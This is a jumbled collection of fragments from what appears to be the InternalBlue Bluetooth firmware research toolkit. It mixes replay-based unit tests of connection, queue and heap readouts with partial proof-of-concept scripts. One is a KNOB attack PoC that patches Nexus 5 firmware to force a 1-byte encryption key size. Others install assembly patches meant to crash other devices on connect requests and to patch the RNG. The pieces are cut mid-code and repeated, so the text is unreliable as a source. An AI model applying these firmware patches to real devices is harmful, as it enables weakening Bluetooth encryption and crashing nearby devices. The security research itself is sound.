def test_info_conn_7():
dummy = ConnectionInformation(7, bytearray.fromhex('0023023a1a2e'), 0, True, 0xc,
bytearray.fromhex('e98a5eaaff39ecb5ce4447590dfb73a4'), 16,
bytearray.fromhex('dbea2d9c47bc1aa6afe664ff31591aa6'), -87,
bytearray.fromhex('0a00c821ffff8ffa'), bytearray.fromhex('9bff598701000000'),
bytearray.fromhex('00'))
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/adbcore/dictionary_tests/info_conn_7.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [ADBCore(log_level='info', data_directory=data_directory, replay=True)]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readConnectionInformation(7)
print(information)
nose.tools.assert_dict_equal(vars(information), vars(dummy))
reference.shutdown()
def test_info_conn_9():
dummy = ConnectionInformation(9, bytearray.fromhex('000000000000'), 0, False, 12,
bytearray.fromhex('00000000000000000000000000000000'), 0, b'', -87,
bytearray.fromhex('0000000000000000'),
bytearray.fromhex('0000000000000000'), bytearray.fromhex('00'))
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/adbcore/dictionary_tests/info_conn_9.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [ADBCore(log_level='info', data_directory=data_directory, replay=True)]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readConnectionInformation(9)
print(information)
nose.tools.assert_dict_equal(vars(information), vars(dummy))
reference.shutdown()
//dummy table entry
.align
table:
.byte 0x35 //nullsub1+1
.byte 0xAC
.byte 0x00
.byte 0x00
.byte 0x10 //length
.byte 0x00
.byte 0x00
.byte 0x00
"""
internalblue = ADBCore()
internalblue.interface = internalblue.device_list()[0][
1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
progress_log = log.info(
"installing assembly patches to crash other device on connect requests...")
#progress_log = log.info("Writing ASM snippet for LMP 00 table lookup.")
code = asm(ASM_SNIPPET_LMP_00_LOOKUP, vma=ASM_LOCATION_LMP_00_LOOKUP)
if not internalblue.writeMem(address=ASM_LOCATION_LMP_00_LOOKUP,
data=code,
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
from internalblue.adbcore import ADBCore
"""
This is a standalone PoC for the KNOB attack on a Nexus 5.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = ADBCore(serial=False)
internalblue.interface = internalblue.device_list()[0][
1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info(
"Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!"
)
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x5AED0) # connection struct key entropy
internalblue.patchRom(0x5AED0, patch)
add r0, 10 // buffer starts at 10 with data
ldr r1, =0x444e4152 // RAND
str r1, [r0]
add r0, 4 // advance buffer by 4
// send hci event
mov r0, r4 // back to buffer at offset 0
bl 0x20F4 // send_hci_event()
pop {r0-r4, pc}
""" % (MEM_ROUNDS, MEM_RNG)
internalblue = ADBCore(log_level='info')
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
internalblue.logger.critical("No connection to target device.")
exit(-1)
internalblue.logger.info("installing assembly patches to crash other device on connect requests...")
# Install the RNG code in RAM
code = asm(ASM_SNIPPET_RNG, vma=ASM_LOCATION_RNG)
if not internalblue.writeMem(address=ASM_LOCATION_RNG, data=code, progress_log=None):
internalblue.logger.critical("error!")
exit(-1)
#!/usr/bin/env python3
# Jiska Classen
# Get receive statistics on a Samsung Galaxy S8 for BLE connection events
from builtins import range
from internalblue.adbcore import ADBCore
import internalblue.hci as hci
import internalblue.cli as cli
from internalblue.utils.pwnlib_wrapper import log, asm, u8, u16
internalblue = ADBCore(serial=True)
device_list = internalblue.device_list()
if len(device_list) == 0:
log.warn("No HCI devices connected!")
exit(-1)
internalblue.interface = device_list[0][1] # just use the first device
"""
# _connTaskRxDone has a Patchram position, S8 fixed almost everything in BLE, because
# they had to for Bluetooth 5 compliance.
# The base address is 0x5E324, and this will jump into the Patchram.
# You need to adjust the RX_DONE_HOOK_ADDRESS in the beginning.
"""
#RX_DONE_HOOK_ADDRESS = 0x1344D0 # on S8 with Patchlevel May 1 2019 on stock ROM
#RX_DONE_HOOK_ADDRESS = 0x134500 # on S8 with Lineage OS Nightly from August 30 2019
RX_DONE_HOOK_ADDRESS = 0x134514 # on S8 with Patchlevel September 1 2019 on stock ROM
HOOKS_LOCATION = 0x210500
ASM_HOOKS = """
from internalblue.cmds import auto_int
"""
This is a standalone PoC for the KNOB attack on a Nexus 5.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = ADBCore(serial=False) # without custom bluetooth.default.so, change to True
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x5AED0) # connection struct key entropy
internalblue.patchRom(0x5AED0, patch)
# modify global variable for own setting
// append buffer with "RAND"
add r0, 10 // buffer starts at 10 with data
ldr r1, =0x444e4152 // RAND
str r1, [r0]
add r0, 4 // advance buffer by 4
// send hci event
mov r0, r4 // back to buffer at offset 0
bl 0xE418 // bthci_event_AttemptToEnqueueEventToTransport
pop {r0-r4, pc}
""" % (MEM_ROUNDS, MEM_RNG, PRAND)
internalblue = ADBCore(log_level='info', serial=True)
internalblue.interface = internalblue.device_list()[0][
1] # just use the first device
# setup sockets
if not internalblue.connect():
internalblue.logger.critical("No connection to target device.")
exit(-1)
internalblue.logger.info("installing assembly patches...")
# Install the RNG code in RAM
code = asm(ASM_SNIPPET_RNG, vma=ASM_LOCATION_RNG)
if not internalblue.writeMem(
address=ASM_LOCATION_RNG, data=code, progress_log=None):
internalblue.logger.critical("error!")
def test_info_queue():
dummy = [
QueueElement(0, 2123152, 4, 16, 0, 16, 2123208, 2123272, 2123268,
2123268, 0, 0, 2123332, 2141676, 'tran_HCIEvent'),
QueueElement(1, 2123332, 8, 31, 0, 31, 2123388, 2123636, 2123436,
2123436, 0, 0, 2123636, 2123152, 'tran_ACLData'),
QueueElement(2, 2123636, 4, 3, 0, 3, 2123692, 2123704, 2123692,
2123692, 0, 0, 2123704, 2123332, 'tran_SCOData'),
QueueElement(3, 2123704, 4, 31, 0, 31, 2123760, 2123884, 2123760,
2123760, 0, 0, 2123884, 2123636,
'tran_UartBridgeNonHCIEvent'),
QueueElement(4, 2123884, 4, 20, 0, 20, 2123940, 2124020, 2124000,
2124000, 0, 0, 2124020, 2123704, 'tran_DiagData'),
QueueElement(5, 2124020, 8, 8, 0, 8, 2124076, 2124140, 2124076,
2124076, 0, 0, 2124140, 2123884, 'tran_HIDUsbKBEvt'),
QueueElement(6, 2124140, 8, 6, 0, 6, 2124196, 2124244, 2124196,
2124196, 0, 0, 2124244, 2124020, 'tran_HIDUsbMSEvt'),
QueueElement(7, 2124244, 8, 1, 0, 1, 2100496, 2100504, 2100496,
2100496, 0, 0, 2124300, 2124140, 'tran_HIDUsbMSCtrl'),
QueueElement(8, 2124300, 8, 1, 0, 1, 2100504, 2100512, 2100504,
2100504, 0, 0, 2124356, 2124244, 'tran_HIDUsbKBCtrl'),
QueueElement(9, 2124356, 8, 32, 0, 32, 2124412, 2124668, 2124412,
2124412, 0, 0, 2110352, 2124300, 'tran_HidAuxData'),
QueueElement(10, 2110352, 8, 12, 0, 12, 2192284, 2192380, 2192300,
2192300, 0, 0, 2120560, 2124356, 'lm_Cmd'),
QueueElement(11, 2120560, 4, 8, 0, 8, 2192380, 2192412, 2192400,
2192400, 0, 0, 2110408, 2110352, 'hci_HciCommand'),
QueueElement(12, 2110408, 8, 19, 0, 19, 2192412, 2192564, 2192412,
2192412, 0, 0, 2118068, 2120560, 'lm_deferredAction'),
QueueElement(13, 2118068, 8, 6, 0, 6, 2192564, 2192612, 2192564,
2192564, 0, 0, 2141588, 2110408, 'lrmmsm_cmd'),
QueueElement(14, 2141588, 4, 8, 0, 8, 2141644, 2141676, 2141644,
2141644, 0, 0, 2141676, 2118068, 'liteHostEvent'),
QueueElement(15, 2141676, 4, 16, 0, 16, 2141732, 2141796, 2141732,
2141732, 0, 0, 2123152, 2141588, 'litehostRcvdL2capData')
]
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/adbcore/dictionary_tests/info_queue.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [
ADBCore(log_level='info', data_directory=data_directory, replay=True)
]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readQueueInformation()
print(information)
nose.tools.assert_equal([vars(element) for element in information],
[vars(element) for element in dummy])
reference.shutdown()
// append buffer with "RAND"
add r0, 10 // buffer starts at 10 with data
ldr r1, =0x444e4152 // RAND
str r1, [r0]
add r0, 4 // advance buffer by 4
// send hci event
mov r0, r4 // back to buffer at offset 0
bl 0x20F4 // send_hci_event()
pop {r0-r4, pc}
""" % (MEM_ROUNDS, MEM_RNG, PRAND)
internalblue = ADBCore(log_level='debug')
internalblue.interface = internalblue.device_list()[0][
1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
progress_log = log.info("installing assembly patches...")
# Install the RNG code in RAM
code = asm(ASM_SNIPPET_RNG, vma=ASM_LOCATION_RNG)
if not internalblue.writeMem(
address=ASM_LOCATION_RNG, data=code, progress_log=progress_log):
progress_log.critical("error!")
def test_info_heap_old():
dummy = [{
'index': 0,
'buffer_headers': {
2194080: 0,
2193828: 2121160,
2193864: 2194008,
2193900: 2194044,
2193936: 2193864,
2193972: 2121160,
2194008: 2193900,
2194044: 2194080
},
'capacity': 8,
'address': 2121160,
'next': 2121208,
'memory_size': 288,
'waitlist_length': 0,
'buffer_list': 2193828,
'memory': 2193828,
'buffer_size': 32,
'prev': 2157672,
'list_length': 7,
'thread_waitlist': 0
}, {
'index': 1,
'buffer_headers': {
2194592: 0,
2194116: 2194184,
2194184: 2194252,
2194252: 2194320,
2194320: 2194388,
2194388: 2194456,
2194456: 2194524,
2194524: 2194592
},
'capacity': 8,
'address': 2121208,
'next': 2121256,
'memory_size': 544,
'waitlist_length': 0,
'buffer_list': 2194184,
'memory': 2194116,
'buffer_size': 64,
'prev': 2121160,
'list_length': 7,
'thread_waitlist': 0
}, {
'index': 2,
'buffer_headers': {
2196000: 2196268,
2197072: 0,
2194660: 2194928,
2195464: 2195732,
2196268: 2196536,
2194928: 2195196,
2195732: 2196000,
2196536: 2196804,
2196804: 2197072,
2195196: 2195464
},
'capacity': 10,
'address': 2121256,
'next': 2121352,
'memory_size': 2680,
'waitlist_length': 0,
'buffer_list': 2194660,
'memory': 2194660,
'buffer_size': 264,
'prev': 2121208,
'list_length': 10,
'thread_waitlist': 0
}, {
'index': 3,
'buffer_headers': {
2214480: 2215548,
2215548: 2216616,
2216616: 0,
2213412: 2214480
},
'capacity': 4,
'address': 2121352,
'next': 2121304,
'memory_size': 4272,
'waitlist_length': 0,
'buffer_list': 2213412,
'memory': 2213412,
'buffer_size': 1064,
'prev': 2121256,
'list_length': 4,
'thread_waitlist': 0
}, {
'index': 4,
'buffer_headers': {
2234124: 0,
2231932: 2233028,
2224260: 2225356,
2219876: 2220972,
2226452: 2227548,
2223164: 2224260,
2228644: 2229740,
2220972: 2222068,
2225356: 2226452,
2230836: 2231932,
2233028: 2234124,
2222068: 2223164,
2227548: 2228644,
2217684: 2218780,
2218780: 2219876,
2229740: 2230836
},
'capacity': 16,
'address': 2121304,
'next': 2157624,
'memory_size': 17536,
'waitlist_length': 0,
'buffer_list': 2217684,
'memory': 2217684,
'buffer_size': 1092,
'prev': 2121352,
'list_length': 16,
'thread_waitlist': 0
}, {
'index': 5,
'buffer_headers': {
2235264: 2235308,
2235616: 2235660,
2235396: 2235440,
2235528: 2235572,
2235660: 2235704,
2235308: 2235352,
2235440: 2235484,
2235704: 2235748,
2235792: 2235836,
2235220: 2235264,
2235748: 2235792,
2235352: 2235396,
2235572: 2235616,
2235836: 0,
2235484: 2235528
},
'capacity': 15,
'address': 2157624,
'next': 2157672,
'memory_size': 660,
'waitlist_length': 0,
'buffer_list': 2235220,
'memory': 2235220,
'buffer_size': 40,
'prev': 2121304,
'list_length': 15,
'thread_waitlist': 0
}, {
'index': 6,
'buffer_headers': {
2236096: 2236132,
2236240: 2236276,
2236132: 2236168,
2236384: 0,
2235880: 2235916,
2236204: 2236240,
2236348: 2236384,
2235916: 2235952,
2235952: 2235988,
2236168: 2236204,
2236312: 2236348,
2235988: 2236024,
2236024: 2236060,
2236276: 2236312,
2236060: 2236096
},
'capacity': 15,
'address': 2157672,
'next': 2121160,
'memory_size': 540,
'waitlist_length': 0,
'buffer_list': 2235880,
'memory': 2235880,
'buffer_size': 32,
'prev': 2157624,
'list_length': 15,
'thread_waitlist': 0
}]
trace = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'traces/adbcore/dictionary_tests/info_heap_old.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [
ADBCore(log_level='info', data_directory=data_directory, replay=True)
]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readHeapInformation()
print(information)
nose.tools.assert_equal(information, dummy)
reference.shutdown()